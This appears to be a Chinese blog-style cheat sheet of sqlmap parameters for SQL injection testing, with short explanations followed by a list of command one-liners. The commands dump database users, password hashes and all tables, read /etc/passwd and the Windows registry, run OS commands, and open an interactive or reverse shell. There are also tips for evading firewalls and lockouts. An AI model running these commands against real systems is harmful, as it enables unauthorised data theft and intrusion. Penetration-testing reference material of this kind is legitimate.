sqlmap我常用到的几个参数

-r "抓的包存放的文件路径.txt"    一般方便带cookie与session类型

--dbms Oracle/Mysql     指定数据库类型

指定变量注入点变量:在变量值(value)后面加*

--level 3    [1-5]

--risk 1   [1-3]

===========决定探测深度(尝试的数量)。

其他的供参考:

TIP1

 

POST注入

有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交。二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测。

查看payload

之 前一直是加本地代理,然后用burpsuit来看sqlmap的payload,到现在才发现用-v参数就可以实现。一直认为-v实现的只是控制警 告,debug信息级别。实际上使用-v 3就可以显示注入的payload,4,5,6还可以显示HTTP请求,HTTP响应头和页面。

使用google搜索

sqlmap可以测试google搜索结果中的sql注入,很强大的功能吧。使用方法是参数-g。不过感觉实际使用中这个用的还是很少的。

请求延时

在 注入过程中请求太频繁的话可能会被防火墙拦截,这时候--delay参数就起作用了。可以设定两次HTTP请求间的延时。有的web程序会在多次错误访问 后屏蔽所有请求,这样就导致之后所有的测试无法进行,绕过这个策略可以使用--safe-url,每隔一段时间去访问一个正常的页面。

伪静态页面

有些web服务器进行了url rewrite或者网站是伪静态的,无法直接提供测试参数,这样子可以使用*来代替要测试的参数。

执行系统命令

当 数据库支持,并且当前用户有权限的时候,可以执行系统命令,使用--os-cmd或者--os-shell,具体的讲,当可以执行多语句的时候,会尝试用 UDF(MySQL,PostgrepSQL)或者xp_cmdshell(MSSQL)来执行系统命令。不能执行多语句时,仍然会尝试创建一个 webshell来执行语句,这时候就需要web的绝对路径了。总体来说,成功率偏低,不过个人也有成功的经验~

测试等级

sqlmap使用--level参数来进行不同全面性的测试,默认为1,不同的参数影响了使用哪些payload,2时会进行cookie注入检测,3时会进行useragent检测。

TIP2

  sqlmap -u “http://url/news id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型
sqlmap -u “http://url/news id=1″--users #列数据库用户
sqlmap -u “http://url/news id=1″--dbs#列数据库
sqlmap -u “http://url/news id=1″--passwords #数据库用户密码
sqlmap -u “http://url/news id=1″--passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap  -u  “http://url/news id=1″  --dump  -C  “password,user,id”  -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news id=1″--dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news id=1″--privileges #查看权限
sqlmap -u “http://url/news id=1″--privileges -U root #查看指定用户权限sqlmap -u “http://url/news id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news id=1″--udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news id=1″--dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news id=1″--union-cols #union 查询表记录
sqlmap -u “http://url/news id=1″--cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news id=1″--b #获取banner信息
sqlmap -u “http://url/news id=1″--data “id=3″#post注入
sqlmap -u “http://url/news id=1″-v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news id=1″--proxy“” #代理注 入
sqlmap -u “http://url/news id=1″--string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news id=1″--sql-shell #执行指定sql命令
sqlmap -u “http://url/news id=1″--file /etc/passwd
sqlmap -u “http://url/news id=1″--os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news id=1″--os-shell #系统交互shell sqlmap -u “http://url/news id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news id=1″--reg-read #读取win系统注册表
sqlmap -u “http://url/news id=1″--dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news id=1″--dbs -o “sqlmap.log” –resume #恢复 已保存进度

原文地址:https://www.cnblogs.com/hookjoy/p/4062884.html